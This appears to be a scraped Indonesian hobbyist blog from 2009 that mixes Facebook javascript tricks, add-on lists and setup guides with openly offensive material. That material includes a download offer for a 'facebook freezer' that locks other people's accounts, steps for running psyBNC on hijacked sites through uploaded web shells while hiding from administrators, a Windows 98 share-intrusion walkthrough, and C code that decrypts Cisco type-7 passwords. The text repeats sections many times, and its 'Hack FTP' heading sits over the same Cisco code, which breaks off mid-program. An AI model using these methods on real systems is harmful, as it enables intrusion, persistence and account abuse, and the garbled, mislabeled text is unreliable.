ngebuat status qt Offline,..
-------------------------------------------------------------------
ini yang mayan lucu,.
saat chating ma tmen di FB ,.coba suruh tmen kmu itu copy-in code ini di address bar:
javascript:statusControl.sendVisibility(false);
maka status dia bakal Offline ,.tentu aja ga permanent,.dia kembali Online setelah klik lg icon
atau gunain code sbalik nya:
javascript:statusControl.sendVisibility(true);
Status dia bakal kembali Online
---------------------------------
merubah warna tampilan navigation bar FB,..
-----------------------------------
xixixi ga usah di jelasin klo yang ini
sekarang kalian buka FB kalian,..lalu klo uda login
ketikan code ni di address bar :
javascript:void(document.getElementById('fb_menubar').style.background='red');
tulisan red dia atas kmu bisa ganti dengan warna lain,..:red,blue,black Dll
tentu aja ga permanent,.tapi mayan kan buat pamerr2 hahaha,..
oh ia coba kmu ganti dengan warna putih atau white,..dijamin tulisan nya bakal Ilang ahahahahah
---------------------------------
Chat history kmu dengan tmen kmu ,meskipun tmen kmu itu Off
------------------------------
biasanya yang sering chat di FB,..sering mengeluh klo window chat FB gada history nya.,
maka sebagian para chatter,ngga meng-close window chat nya ama seseorang ,hanya buat pengen liat history nya ama c doi
tapi karena terlajur ke -close n pengen liat history chat kemaren,tapi nunggu c doi
Ol Lma,.
kmu bisa gunain Code ini untuk memunculkan window chat kmu dengan c doi walaupun c doi OFF
javascript:buddyList.itemOnClick(#########);
ganti ##### dengan id profile tmen kmu itu,..
cara dapet profile id na gmana???
buka profile tmen kmu ,liat di address bar
contoh :http://www.facebook.com/profile.php?id=1773753904&ref=mf
maka profile id na :1773753904
,...
kalau pengen tes,..coba aja pake id profile sendri,..
maka window chat ke diri sendiri terbuka,..??bingung ya,.hahha,coba aja pake id profile sendiri
mayan buat catetan kan,..hehe ,tapi jangan di andelin buat catatan,.
--------------------------------------
mengubah nama kmu sementara
--------------------------------------
nama kmu bisa berubah sementara,...tapi sayang tmen2 kmu yang Ol liat kMU sebagai orang
dengan nama tertera asli nya,..
tapi mayan buat pamer hehe
pake code ini :
javascript:void(document.title="Facebook | d4rk");
maka tapilan nama nya jadi d4rk
--------------------------------
Mengclose jarak jauh chat window
-------------------------------
semisal si user dengan id =123 sedang chatting dengan user dengan Id=321
terus kmu suruh si id=123 ketikan Code ini :
javascript:chatDisplay.tabs[321].tabXOnClick();
maka chatingan id=123 bkal ke close dengan c id=321,..
-----------------------------------
hacks lain2 nya
---------------------------------
-mengeluarkan isi notifikasi window :
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
-mengeluarkan list Friend yang OL :
javascript:buddyList.toggleTab();
-mengeluarkan tab Application
javascript:applicationDock.toggleTab();
-ketika sedang chat,..terus kata2 kita pengen di BOld ,maka gunain bintang
contoh : *test* ,yang keluar adalah : test
kalau pengen di underline ,..pake "_"
contoh : _test_, maka yang keluar adalah: test
Senin, 05 Oktober 2009
Download Facebook Chat Gratis
Buat facebook-er yang hobi chat di facebook. Malam ini krisna mau bagikan aplikasi facebook chat secara gratis. Ukuran filenya cuma 1,38 MB. Aplikasi facebook chat ini mempunyai kemampuan untuk chat di facebook tanpa harus membuka web browser. Jadi memudahkan facebook-er untuk chat di facebook sepuasnya. hehehe, mau ?
untuk bisa download gratis aplikasi facebook chat, bisa klik download disini
^ ^
untuk bisa download gratis aplikasi facebook chat, bisa klik download disini
^ ^
Cara Membuat Daftar Teman Di Facebook
Langsung Aja : thumbsdown
Caranya begini :
1. Login terlebih dahulu di facebook anda.
2. Buka URL berikut ini : klik disini
3. Klik Buat Daftar Baru.
4. Ketikkan nama daftar teman anda. Misal : Teman SMA.
5. Pilih teman-teman facebook anda untuk dimasukkan ke daftar teman yang akan anda buat.
6. Kalau sudah, klik Buat Daftar.
Selesai dech... Gimana ? Mudahkan ! Selamat mencoba ...
uda Gitu Aja Smoga Sukses Balikita penguin
Caranya begini :
1. Login terlebih dahulu di facebook anda.
2. Buka URL berikut ini : klik disini
3. Klik Buat Daftar Baru.
4. Ketikkan nama daftar teman anda. Misal : Teman SMA.
5. Pilih teman-teman facebook anda untuk dimasukkan ke daftar teman yang akan anda buat.
6. Kalau sudah, klik Buat Daftar.
Selesai dech... Gimana ? Mudahkan ! Selamat mencoba ...
uda Gitu Aja Smoga Sukses Balikita penguin
* macam macam add ons modzila untuk facebook kamu
caranya download add to modzila dan instal aja.,....
Facebook Photo Album Downloader 0.2...............klik disini
HugBack for Facebook 2.0...........klik disini
Facebook Toolbar 1.3..........klik disini
Facebook Video 2.1.6.............klik disini
Pink Facebook 1.2.........klik disini
Notre Dame Facebook Style 3.0.............klik disini
FacePAD: Facebook Photo Album Downloader 0.5.5......klik disini
Facebar 1.5.1........klik disini
Friendbar 1.0.4.......klik disini
TokBox Voice and Video Calls 1.0.2 buat chat fb.........klik disini
Boost for Facebook 9.3.2.......klik disini
Who Is This Person? 1.1.1.....klik disini
Blood Automation 0.2..........klik disini
AppBlock 0.03.........klik disini
Facebook profile pictures 1.0.5........klik disini
Facebook Auto-Colorizer 1.0.9.......klik disini
mainfo.org - facebook slideshow 1.0......klik disini
UltimateFacebook 0.3.1......klik disini
Six Degrees of Separation 1.02.........KLIK DISINI
theSUPERprofile 1.1.0......klik disini
Loki 2.2.2........klik disini
Facebook App Filter 20070710.....klik disini
Facebook Secure 0.1.........klik disini
Facebook HTML Uncomment 1.1.........KLIIK DISINI
Old Facebook 0.1.....klik disini
Fixing Facebook 2.0.............klik disini
Facebook Sidebar Statusbutton 0.0.6-...........klik disini
FacebookFixURL 1.0.2........klik disini
Facebook time wasted calculator (Firefox 2.0.0.1 edition) 1.0.......klik disini
Facebook Photo Album Downloader 0.2...............klik disini
HugBack for Facebook 2.0...........klik disini
Facebook Toolbar 1.3..........klik disini
Facebook Video 2.1.6.............klik disini
Pink Facebook 1.2.........klik disini
Notre Dame Facebook Style 3.0.............klik disini
FacePAD: Facebook Photo Album Downloader 0.5.5......klik disini
Facebar 1.5.1........klik disini
Friendbar 1.0.4.......klik disini
TokBox Voice and Video Calls 1.0.2 buat chat fb.........klik disini
Boost for Facebook 9.3.2.......klik disini
Who Is This Person? 1.1.1.....klik disini
Blood Automation 0.2..........klik disini
AppBlock 0.03.........klik disini
Facebook profile pictures 1.0.5........klik disini
Facebook Auto-Colorizer 1.0.9.......klik disini
mainfo.org - facebook slideshow 1.0......klik disini
UltimateFacebook 0.3.1......klik disini
Six Degrees of Separation 1.02.........KLIK DISINI
theSUPERprofile 1.1.0......klik disini
Loki 2.2.2........klik disini
Facebook App Filter 20070710.....klik disini
Facebook Secure 0.1.........klik disini
Facebook HTML Uncomment 1.1.........KLIIK DISINI
Old Facebook 0.1.....klik disini
Fixing Facebook 2.0.............klik disini
Facebook Sidebar Statusbutton 0.0.6-...........klik disini
FacebookFixURL 1.0.2........klik disini
Facebook time wasted calculator (Firefox 2.0.0.1 edition) 1.0.......klik disini
facebook freezer
disini saya menyediakan facebook freezer yang terbaRU..

Fitur:
1-normal freezer (beku)normal yang hanya akan Mengunci account seperti Facebook freezer
2- Forever Freeze (beku) yang tidak akan berhenti sampai program ini ditutup Black Hat
3-Watch tindakan (Mode) yang Anda dapat menyaksikan keindahan pembekuan hehehe
Download freezer tersebut disini
selamat mencoba.....^ ^

Fitur:
1-normal freezer (beku)normal yang hanya akan Mengunci account seperti Facebook freezer
2- Forever Freeze (beku) yang tidak akan berhenti sampai program ini ditutup Black Hat
3-Watch tindakan (Mode) yang Anda dapat menyaksikan keindahan pembekuan hehehe
Download freezer tersebut disini
selamat mencoba.....^ ^
F|B lo ada layoutnya
hi.......aku mo nunjukin ke kamu smua cara buat layout di fb....
pertama tama kamu harus instal ini di Fb lo https://addons.mozilla.org/en-US/firefox/addon/2108/
kedua kamu tinggal pilih style model FB sesuka Hati kamu disini http://userstyles.org/styles/site/facebook.com
selanjutnya terserah kamu deh....
pertama tama kamu harus instal ini di Fb lo https://addons.mozilla.org/en-US/firefox/addon/2108/
kedua kamu tinggal pilih style model FB sesuka Hati kamu disini http://userstyles.org/styles/site/facebook.com
selanjutnya terserah kamu deh....
Jumat, 18 September 2009
Download You tube Tanpa Sofware
1.cari video yg mau di download di youtube dan copy ulrnya videonya
2.klw sudah di copy ULR videonya buka URL ini klik disini paste ULR video td yg mau di download.
3.lalu tunggu downloadnya selesai
klw selesai di download selamat menikmatinya
tambahan:
jika video ingin bisa di nikmati di hp,mp4,i-pod,mp3,psp dll.
kalian bisa download soft video converter ubah ext .3gp .avi .mp4 .dll
2.klw sudah di copy ULR videonya buka URL ini klik disini paste ULR video td yg mau di download.
3.lalu tunggu downloadnya selesai
klw selesai di download selamat menikmatinya
tambahan:
jika video ingin bisa di nikmati di hp,mp4,i-pod,mp3,psp dll.
kalian bisa download soft video converter ubah ext .3gp .avi .mp4 .dll
Mempercantik Friendster Dengan HTML (1)
Di Friendster memungkinkan member menyisipkan kode html untuk mempercantik tampilan layout profil member. Tapi karena alasan keamanan dan struktur default html friendster, tidak semua kede html bisa disisipkan. Disamping itu tidak semua kolom pada profil bisa disisipi kode html, hanya kolom “About Me”, “Who to Meet” dan “Testimonies & Comment”.
Dibanding dengan CSS, HTML memang terbatas dalam mempercantik profil, karena fungsi html memang tidak untuk styling. Tapi kelebihan html, syntax kodenya sangat sederhana dan dapat diaplikasi di teks tertentu. Sedangkan CSS meskipun style-nya lengkap, tapi CSS hanya bisa diaplikasikan di ID dan class yang sudah ditentukan oleh Friendster
Kode html apa saja yang bisa pakai difriendster, bagaimana penulisannya, dan seperti apa tampilannya? silahkan download cheat sheet html untuk friendster disini
Jika link diatas tidak bekerja silahkan klik disini untuk men download nya.
Cheat sheet ini hanya sebagaian saja, kode html untuk friendster yang lainnya akan menyusul
Dibanding dengan CSS, HTML memang terbatas dalam mempercantik profil, karena fungsi html memang tidak untuk styling. Tapi kelebihan html, syntax kodenya sangat sederhana dan dapat diaplikasi di teks tertentu. Sedangkan CSS meskipun style-nya lengkap, tapi CSS hanya bisa diaplikasikan di ID dan class yang sudah ditentukan oleh Friendster
Kode html apa saja yang bisa pakai difriendster, bagaimana penulisannya, dan seperti apa tampilannya? silahkan download cheat sheet html untuk friendster disini
Jika link diatas tidak bekerja silahkan klik disini untuk men download nya.
Cheat sheet ini hanya sebagaian saja, kode html untuk friendster yang lainnya akan menyusul
Membuat email free dengan nama sendiri
Mungkin bagi sebagian orang artikel ini sudah basi/membosankan, tetapi saya akan mencoba mengulas cara membuat email gratis dengan nama sendiri tanpa embel-embel gmail, yahoo, dan sebagainya. Coba anda kunjungi alamat ini, tapi ingat jangan pindah dari auracms ke joomla. lalu anda cari artikel 3 serangkai, lalu anda ikuti langkah-langkah yang tertulis disitu tetapi berhenti setelah domain co.cc aktif dan yang di 000webhost sudah aktif.
Setelah account anda aktif, anda buka cpanel anda, misalnya eldo-s.co.cc/cpanel, anda cari email forwarder lalu klik, lalu anda isi field yang kosong, misalnya nama@domain.co.cc, lalu difordward ke nama@gmail.com, setelah itu, anda pergi ke gmail, log in, lalu ikuti langkah-langkah berikut:
1. Klik Pengaturan/setting yang berada di sebelah atas kanan.
2. Pilih Account.
3. Klik Tambah alamat email lainnya
4. Lalu tulis alamat email tadi, ex. eldo@eldo-s.co.cc
5. Klik kirim verifikasi
6. Periksa Inbox anda, atau seringkali di Spam
7. Lalu anda klik link verifikasinya
8. Copy angka verifikasinya, dan masukkan ke window kecil tadi
9. Klik Verifikasi
Mudah khan!!
Setelah account anda aktif, anda buka cpanel anda, misalnya eldo-s.co.cc/cpanel, anda cari email forwarder lalu klik, lalu anda isi field yang kosong, misalnya nama@domain.co.cc, lalu difordward ke nama@gmail.com, setelah itu, anda pergi ke gmail, log in, lalu ikuti langkah-langkah berikut:
1. Klik Pengaturan/setting yang berada di sebelah atas kanan.
2. Pilih Account.
3. Klik Tambah alamat email lainnya
4. Lalu tulis alamat email tadi, ex. eldo@eldo-s.co.cc
5. Klik kirim verifikasi
6. Periksa Inbox anda, atau seringkali di Spam
7. Lalu anda klik link verifikasinya
8. Copy angka verifikasinya, dan masukkan ke window kecil tadi
9. Klik Verifikasi
Mudah khan!!
Senin, 27 Juli 2009
Install psyBNC & Eggdrop di cpanel bug
kebiasaan hacker hacker kita mencari rooting adalah untuk membuat bot eggdrop atau membuat psybnc. Namun saya beranggapan bhw kebanyakan teman teman sekalian kebingungan cara sehingga banyaklah situs situs yang di deface.
apakah kita bisa install psybnc di cpanel bug ?
lebih lanjut...
1. saya anggap bhw anda sudah berhasil melakukan upload ke dalam situs yang anda ambil lewat cpanel bug. Bila anda belum paham, silahkan anda baca tutorial tentang mengexplorasi cpanel < 5.3 di tulisan sebelumnya.
2. Upload ke dalam situs tersebut file yang bisa sebagai mediator seperti layaknya shell. Beberapa file yang bisa dijadikan mediator antara lain cgitelnet.pl, myshell.php, phpshell.php.
3. Bekerjalah di mediator tersebut.
4. Saat bekerja dengan mediator tersebut perlu anda ingat bhw kita bekerja di port 80 dengan notabene bhw anda adalah nobody (id) sehingga kita tdk bisa melakukan apapun di dalamnya. Namun kita bisa bekerja di wilayah /tmp/. Pindahlah ke folder /tmp/ dan selanjutnya bekerjalah diruang lingkup tersebut.
5. Proses instalasi psyBNC tidak akan saya jelaskan disini, karena saya anggap bhw anda sudah mahir. namun yang jadi sering kendala adalah saat mengganti port psyBNC tersebut.
6. Untuk melakukan editing port yaitu dengan menggunakan command echo. pertama adalah lakukan cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
Tentunya anda perlu buat ganti port tersebut.
ketiklah sebagai berikut untuk mengganti portnya
echo PSYBNC.SYSTEM.PORT1=5000 > psybnc.conf ; echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf ; echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
sehingga kita mendapatkan port baru yaitu port 5000
7. selanjutnya tinggal running ./psybnc dan saya sarankan anda buat menggunakan program fake untuk menghindari adminnya.
apakah kita bisa install psybnc di cpanel bug ?
lebih lanjut...
1. saya anggap bhw anda sudah berhasil melakukan upload ke dalam situs yang anda ambil lewat cpanel bug. Bila anda belum paham, silahkan anda baca tutorial tentang mengexplorasi cpanel < 5.3 di tulisan sebelumnya.
2. Upload ke dalam situs tersebut file yang bisa sebagai mediator seperti layaknya shell. Beberapa file yang bisa dijadikan mediator antara lain cgitelnet.pl, myshell.php, phpshell.php.
3. Bekerjalah di mediator tersebut.
4. Saat bekerja dengan mediator tersebut perlu anda ingat bhw kita bekerja di port 80 dengan notabene bhw anda adalah nobody (id) sehingga kita tdk bisa melakukan apapun di dalamnya. Namun kita bisa bekerja di wilayah /tmp/. Pindahlah ke folder /tmp/ dan selanjutnya bekerjalah diruang lingkup tersebut.
5. Proses instalasi psyBNC tidak akan saya jelaskan disini, karena saya anggap bhw anda sudah mahir. namun yang jadi sering kendala adalah saat mengganti port psyBNC tersebut.
6. Untuk melakukan editing port yaitu dengan menggunakan command echo. pertama adalah lakukan cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
Tentunya anda perlu buat ganti port tersebut.
ketiklah sebagai berikut untuk mengganti portnya
echo PSYBNC.SYSTEM.PORT1=5000 > psybnc.conf ; echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf ; echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
sehingga kita mendapatkan port baru yaitu port 5000
7. selanjutnya tinggal running ./psybnc dan saya sarankan anda buat menggunakan program fake untuk menghindari adminnya.
Install 2 OS
1. saya asumsikan bahwa komputer anda sudah terinstalasi windows 98 (win 2000) dengan baik, apa bila belum maka bapak dapat menginstalnya terlebih dahulu.
2. bila windows 98 sudah terinstal, maka ada baiknya bapak sudah memback-up semua data bapak, kalau-kalau terjadi kesalahan dalam mempartisi, karena kita masih sam-sama belajar, jadi pada awalnya kita harus membuat pencegahan.
3. kemudian installah partition magic 7.0 (ada dalam : pc shop 2002, pc shop 121, pc shop 2003)pada komputer bapak. dari sinilah kita memulai partisi dari hardisk tersebut.
4.setelah partition magic tadi sudah terinstal (diasumsikan bahwa tidak ada masalah pada saat anda mengFDISK komputer bapak), dalam hardisk bapak terbagi dua c:/ dan d:/, maka kita buat new partition pada hardisk bapak tersebut, kemudian kita bisa memilihnya , ada linux dan lain-lain (baca semua instruksinya, dan ikuti semua keterangan yang "recomended").
setelah partisi untuk linux dan swap-nya sudah di buat, maka bapak dapat merestart komputer bapak, dan selanjutnya partition maic yan akan bekerja untuk membagi harddisk tersebut.
5. (diasumsikan bahwa hardisk tsb telah terpartisi), maka bapak dapat merestart kembali dan kemudian mengset bios agar dapat booting dari cd-rom. lalu bapak masukan linux redhat 7.3 dan mulailah untuk menginstalnya. bapak dapat menggunakan yang graphic mode agar lebih mudah dalam penginstalan.
6. setelah itu anda tinggal next, kemudian tibalah pada language bapak dapat memilih English next lagi, installation type bapak pilih workstation, kemudian disk partitioning setup, bapak pilih “have the installer automatically partition for you”.
7. tiba pada “Automatic Partitioning” bapak pilih keep all partition and use existing free space kemudian next, bila ada pilihan (pilih OK).
8. tiba pada disk setup : klik di table dibawah yang memunyai mount = / (garis miring) kemudian di next lalu (OK).
9. boot loade configuration : bapak dapat memilih GRUB, terserah apabila mau memilih lilo, tapi kemarin saya memakai grub dan tidak bermasalah. kemudian klik di boot image nya pilih boot label DOS. Lalu tinggal next, dan selanjutnya untuk instalasi yang lain mungkin bapak bisa lanjutkan sendiri. Karena semua yang berhubungan dengan setting dual OS sudah lewat.
2. bila windows 98 sudah terinstal, maka ada baiknya bapak sudah memback-up semua data bapak, kalau-kalau terjadi kesalahan dalam mempartisi, karena kita masih sam-sama belajar, jadi pada awalnya kita harus membuat pencegahan.
3. kemudian installah partition magic 7.0 (ada dalam : pc shop 2002, pc shop 121, pc shop 2003)pada komputer bapak. dari sinilah kita memulai partisi dari hardisk tersebut.
4.setelah partition magic tadi sudah terinstal (diasumsikan bahwa tidak ada masalah pada saat anda mengFDISK komputer bapak), dalam hardisk bapak terbagi dua c:/ dan d:/, maka kita buat new partition pada hardisk bapak tersebut, kemudian kita bisa memilihnya , ada linux dan lain-lain (baca semua instruksinya, dan ikuti semua keterangan yang "recomended").
setelah partisi untuk linux dan swap-nya sudah di buat, maka bapak dapat merestart komputer bapak, dan selanjutnya partition maic yan akan bekerja untuk membagi harddisk tersebut.
5. (diasumsikan bahwa hardisk tsb telah terpartisi), maka bapak dapat merestart kembali dan kemudian mengset bios agar dapat booting dari cd-rom. lalu bapak masukan linux redhat 7.3 dan mulailah untuk menginstalnya. bapak dapat menggunakan yang graphic mode agar lebih mudah dalam penginstalan.
6. setelah itu anda tinggal next, kemudian tibalah pada language bapak dapat memilih English next lagi, installation type bapak pilih workstation, kemudian disk partitioning setup, bapak pilih “have the installer automatically partition for you”.
7. tiba pada “Automatic Partitioning” bapak pilih keep all partition and use existing free space kemudian next, bila ada pilihan (pilih OK).
8. tiba pada disk setup : klik di table dibawah yang memunyai mount = / (garis miring) kemudian di next lalu (OK).
9. boot loade configuration : bapak dapat memilih GRUB, terserah apabila mau memilih lilo, tapi kemarin saya memakai grub dan tidak bermasalah. kemudian klik di boot image nya pilih boot label DOS. Lalu tinggal next, dan selanjutnya untuk instalasi yang lain mungkin bapak bisa lanjutkan sendiri. Karena semua yang berhubungan dengan setting dual OS sudah lewat.
Hack Windows 98
1. Ok, first check to see that you have all of the necessary files.
Here they are, these should be in the control panel (start, run, control panel, network).
1. NetBEUI
2. TCP/IP
3. IPX/SPX
4. Client for Microsoft Networks
5. File Sharing for Microsoft
Of course you will also have a dial up adapter or an ethernet adapter based on
your network topology.
Ok, now that you have all that installed, you can check out remote computers.
Windows 95 is very limited in the ways you can attack remote hosts. After many
long hours I figured out a way that always works. Ok, so first get an IP. These
are easy to get. You can go on IRC and just /whois people or you can use Legion, just
check a search engine to check a bunch of IP's with filesharing enabled.
Ok, so now that you have an IP, try this...
nbtstat -A 123.456.789.1 (Fill in actual IP)
Netbios Name
^
SHARE <00>
SHARE <20> That's what we want!
FILE <1b>
and so on..
If they have the 20 there that means that they might be vulnerable. So,
go to start, programs, accessories, notepad. Then, go to start, run,
c:\windows. Then click and drag the lmhosts (exactly lmhosts, not lmhosts.sam. Check
winfile for extension) into the notepad. Add the following. So, we have our IP and netbiosname
123.456.789.1 SHARE #PRE
Then, click on File, Save. Then from MS-DOS prompt type
nbtstat -R <-- to refresh netbios>
Then, go to start, find, computer and enter the netbiosname of the
computer of the IP you have. If it finds it, that means that it has
filesharing on it, if you get a password prompt, you can try but I wouldn't
suggest it. Many computers don't have password protection. So, this was really
brief but it works, and that's what matters.
Here they are, these should be in the control panel (start, run, control panel, network).
1. NetBEUI
2. TCP/IP
3. IPX/SPX
4. Client for Microsoft Networks
5. File Sharing for Microsoft
Of course you will also have a dial up adapter or an ethernet adapter based on
your network topology.
Ok, now that you have all that installed, you can check out remote computers.
Windows 95 is very limited in the ways you can attack remote hosts. After many
long hours I figured out a way that always works. Ok, so first get an IP. These
are easy to get. You can go on IRC and just /whois people or you can use Legion, just
check a search engine to check a bunch of IP's with filesharing enabled.
Ok, so now that you have an IP, try this...
nbtstat -A 123.456.789.1 (Fill in actual IP)
Netbios Name
^
SHARE <00>
SHARE <20> That's what we want!
FILE <1b>
and so on..
If they have the 20 there that means that they might be vulnerable. So,
go to start, programs, accessories, notepad. Then, go to start, run,
c:\windows. Then click and drag the lmhosts (exactly lmhosts, not lmhosts.sam. Check
winfile for extension) into the notepad. Add the following. So, we have our IP and netbiosname
123.456.789.1 SHARE #PRE
Then, click on File, Save. Then from MS-DOS prompt type
nbtstat -R <-- to refresh netbios>
Then, go to start, find, computer and enter the netbiosname of the
computer of the IP you have. If it finds it, that means that it has
filesharing on it, if you get a password prompt, you can try but I wouldn't
suggest it. Many computers don't have password protection. So, this was really
brief but it works, and that's what matters.
Hacking Cisco
#include
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Selamat mencoba moga2 berguna buat temen.
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Selamat mencoba moga2 berguna buat temen.
Hack FTP
#include
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
